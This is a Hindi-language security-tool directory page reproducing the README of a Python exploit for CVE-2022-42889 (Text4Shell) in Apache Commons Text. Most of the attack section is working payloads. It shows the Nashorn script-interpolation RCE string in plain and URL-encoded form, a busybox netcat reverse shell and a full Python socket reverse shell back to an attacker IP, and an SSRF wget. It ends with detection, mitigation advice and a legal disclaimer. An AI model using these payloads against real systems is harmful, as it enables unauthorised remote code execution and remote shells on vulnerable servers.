Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-42889 — CVE-2022-42889 (Text4Shell) के लिए Python exploit जो Apache Commons Text इंटरपोलेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है। यह रिवर्स शेल जनरेशन, SSRF, और कस्टम कमांड निष्पादन का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/engranaabubakar/cve-2022-42889
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubengranaabubakar/cve-2022-42889

CVE-2022-42889

CVE-2022-42889 (Text4Shell) के लिए Python exploit जो Apache Commons Text इंटरपोलेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है। यह रिवर्स शेल जनरेशन, SSRF, और कस्टम कमांड निष्पादन का समर्थन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
56 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

🚀 CVE-2022-42889 (Text4Shell) शोषण

Python 3 License CVE

CVE-2022-42889 (Text4Shell) के लिए एक Python शोषण, जो Apache Commons Text के 1.10.0 से पहले के संस्करणों में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता है।

📋 सामग्री तालिका

  • विवरण
  • भेद्यता विवरण
  • प्रभावित संस्करण
  • शोषण सुविधाएँ
  • आवश्यकताएँ
  • उपयोग
  • उदाहरण
  • यह कैसे काम करता है
  • पता लगाना
  • शमन
  • संदर्भ
  • अस्वीकरण
  • 📝 विवरण

    यह शोषण CVE-2022-42889 (Text4Shell) को लक्षित करता है, जो Apache Commons Text में एक भेद्यता है, जो StringLookup इंटरपोलेटर द्वारा संसाधित विशेष रूप से तैयार किए गए इनपुट स्ट्रिंग्स के माध्यम से दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।

    यह भेद्यता Log4Shell के समान प्रभाव वाली है लेकिन यह एक अलग लाइब्रेरी को प्रभावित करती है। जब उपयोगकर्ता-नियंत्रित इनपुट कमजोर विधियों में पास किया जाता है, तो एक हमलावर लक्ष्य प्रणाली पर मनमाना कोड निष्पादित कर सकता है।

    🎯 भेद्यता विवरण

    • CVE ID: CVE-2022-42889
    • CVSS स्कोर: 9.8 (गंभीर)
    • हमला वेक्टर: नेटवर्क
    • आवश्यक विशेषाधिकार: कोई नहीं
    • उपयोगकर्ता सहभागिता: कोई नहीं
    • प्रभाव: पूर्ण सिस्टम समझौता

    कमजोर घटक

    Apache Commons Text StringLookup इंटरफ़ेस के माध्यम से स्ट्रिंग इंटरपोलेशन प्रदान करता है। इंटरपोलेटर लुकअप विभिन्न उपसर्गों के साथ अभिव्यक्तियों के मूल्यांकन की अनुमति देता है, जिनमें शामिल हैं:

    • ${script:javascript:...} - जावास्क्रिप्ट कोड निष्पादित करता है (Nashorn इंजन)
    • ${url:UTF-8:...} - URL लाता है (SSRF)
    • ${dns:...} - DNS लुकअप

    ⚠️ प्रभावित संस्करण

    उत्पादप्रभावित संस्करणपैच किया गया संस्करण
    Apache Commons Text< 1.10.01.10.0
    Java< 15 (RCE के लिए)15+ (Nashorn अक्षम)

    नोट: Java ≥ 15 script उपसर्ग के माध्यम से RCE के लिए कमजोर नहीं हैं (Nashorn अक्षम है), लेकिन url और dns उपसर्गों के माध्यम से SSRF के लिए कमजोर हो सकते हैं।

    ✨ शोषण सुविधाएँ

    • ✅ दूरस्थ कोड निष्पादन (RCE) जावास्क्रिप्ट इंटरपोलेशन के माध्यम से
    • ✅ सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) URL इंटरपोलेशन के माध्यम से
    • ✅ दुर्भावनापूर्ण पेलोड का URL एन्कोडिंग
    • ✅ कस्टम कमांड निष्पादन
    • ✅ LHOST/LPORT के साथ रिवर्स शेल जनरेशन
    • ✅ त्रुटि प्रबंधन और प्रतिक्रिया प्रदर्शन

    📦 आवश्यकताएँ

    • Python 3.6+
    • requests लाइब्रेरी

    निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip install requests
    

    🚀 उपयोग

    root@kitploit:~
    python3 text4shell.py -t <TARGET_IP> -p <PORT> -c <COMMAND> --lhost <YOUR_IP> --lport <YOUR_PORT>
    

    तर्क

    तर्कविवरणआवश्यक
    -t, --targetलक्ष्य IP पता✅ हाँ
    -p, --portलक्ष्य पोर्ट (डिफ़ॉल्ट: 8080)❌ नहीं
    -c, --commandनिष्पादित करने का कमांड✅ हाँ
    --lhostरिवर्स शेल के लिए आपका IP✅ हाँ
    --lportरिवर्स शेल के लिए आपका पोर्ट✅ हाँ

    💻 उदाहरण

    उदाहरण 1: सरल कमांड परीक्षण

    root@kitploit:~
    python3 text4shell.py -t 192.168.1.100 -p 8080 -c "touch /tmp/test" --lhost 192.168.1.50 --lport 4444
    

    उदाहरण 2: netcat के साथ रिवर्स शेल

    root@kitploit:~
    # लिसनर प्रारंभ करें
    nc -lvnp 4444
    
    # शोषण चलाएँ
    python3 text4shell.py -t 192.168.1.100 -p 8080 -c "busybox nc 192.168.1.50 4444 -e bash" --lhost 192.168.1.50 --lport 4444
    

    उदाहरण 3: Python रिवर्स शेल

    root@kitploit:~
    python3 text4shell.py -t 192.168.1.100 -p 8080 -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.50\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" --lhost 192.168.1.50 --lport 4444
    

    उदाहरण 4: SSRF परीक्षण

    root@kitploit:~
    python3 text4shell.py -t 192.168.1.100 -p 8080 -c "wget http://192.168.1.50:8000/test" --lhost 192.168.1.50 --lport 4444
    

    🔧 यह कैसे काम करता है

    पेलोड निर्माण:

    स्क्रिप्ट ${script:javascript:...} सिंटैक्स का उपयोग करके एक दुर्भावनापूर्ण स्ट्रिंग बनाती है:

    root@kitploit:~
    ${script:javascript:java.lang.Runtime.getRuntime().exec('COMMAND')}
    

    URL एन्कोडिंग:

    विशेष वर्णों को उचित संचरण सुनिश्चित करने के लिए URL-एनकोड किया जाता है:

    root@kitploit:~
    %24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27COMMAND%27%29%7D
    

    HTTP अनुरोध:

    स्क्रिप्ट निम्नलिखित पर GET अनुरोध भेजती है:

    root@kitploit:~
    http://TARGET:PORT/search?query=ENCODED_PAYLOAD
    

    कमांड निष्पादन:

    यदि लक्ष्य कमजोर है, तो वह जावास्क्रिप्ट का मूल्यांकन करता है और कमांड निष्पादित करता है।

    🔍 पता लगाना

    जाँच करें कि आपका सिस्टम कमजोर है या नहीं:

    मैनुअल परीक्षण:

    root@kitploit:~
    curl -s "http://target:8080/search?query=\${script:javascript:7*7}"
    

    यदि प्रतिक्रिया में ${script:javascript:7*7} के बजाय 49 है, तो सिस्टम कमजोर है।

    संस्करण जाँच:

    • एप्लिकेशन में CHANGELOG या README फ़ाइलों में Apache Commons Text संस्करण की जाँच करें
    • commons-text-*.jar फ़ाइलों की तलाश करें

    🛡️ शमन

    Apache Commons Text को संस्करण 1.10.0 या उच्चतर में अपग्रेड करें

    root@kitploit:~
    <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-text</artifactId>
        <version>1.10.0</version>
    </dependency>
    

    Java 15+ में अपग्रेड करें (Nashorn JavaScript इंजन को अक्षम करता है)

    इनपुट सत्यापन: उपयोगकर्ता इनपुट का सख्त सत्यापन लागू करें

    इंटरपोलेशन अक्षम करें: यदि आवश्यक न हो, तो StringSubstitutor.createInterpolator() का उपयोग करने से बचें

    वेब एप्लिकेशन फ़ायरवॉल (WAF): ${script:javascript:} पैटर्न वाले अनुरोधों को ब्लॉक करें

    📚 संदर्भ

    • NVD - CVE-2022-42889
    • Apache Commons Text सुरक्षा
    • Tarlogic - Text4Shell विश्लेषण
    • CISA चेतावनी

    ⚠️ अस्वीकरण

    यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन प्रणालियों के विरुद्ध इस शोषण का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति नहीं है, अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

    📄 लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

    🤝 योगदान

    योगदान, मुद्दे और सुविधा अनुरोधों का स्वागत है! मुद्दे पृष्ठ पर जाँच करने के लिए स्वतंत्र महसूस करें।

    हैप्पी हैकिंग! 🚀

    टूल डाउनलोड करें